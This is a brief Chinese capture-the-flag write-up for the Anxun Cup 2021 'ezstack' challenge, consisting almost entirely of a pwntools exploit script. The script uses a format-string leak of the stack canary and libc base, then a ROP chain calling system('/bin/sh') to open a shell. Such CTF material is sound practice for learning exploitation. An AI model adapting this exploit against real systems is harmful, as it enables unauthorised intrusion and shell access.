安洵杯2021

ezstack

格式化字符串漏洞+ROP

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#coding:utf-8
from pwn import *
from LibcSearcher import *
import time, sys, base64

context.os = 'linux'
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'

# 1 pro
# 2 remote
# 3 127
debug = 1
filename = 'ezstack'

if debug == 1 :
    p = process(filename)
if debug == 2:
    p = remote('node4.buuoj.cn',20002)
if debug == 3:
    p = remote('127.0.0.1',12345)
    #23946

elf = ELF(filename)
libc = elf.libc

# gdb.attach(p,'b *$rebase(0xA29)')
# gdb.attach(p,'b *$rebase(0xA5C)')

payload = '%11$p%13$p'
p.sendline(payload)

p.recvuntil('0x')
canary = int(p.recv(16),16)
p.recvuntil('0x')
main = int(p.recv(12),16) - 240

libc_base = main - libc.sym['__libc_start_main']
system_addr = libc_base + libc.sym['system']
pop_rdi = libc_base + next(libc.search(asm('pop rdi\nret')))
bin_sh = libc_base + next(libc.search('/bin/sh'))

p.recvuntil('--+--')
payload = 'a'*0x18 + p64(canary) + p64(pop_rdi)*2 + p64(bin_sh) + p64(system_addr)
p.sendline(payload)

p.interactive()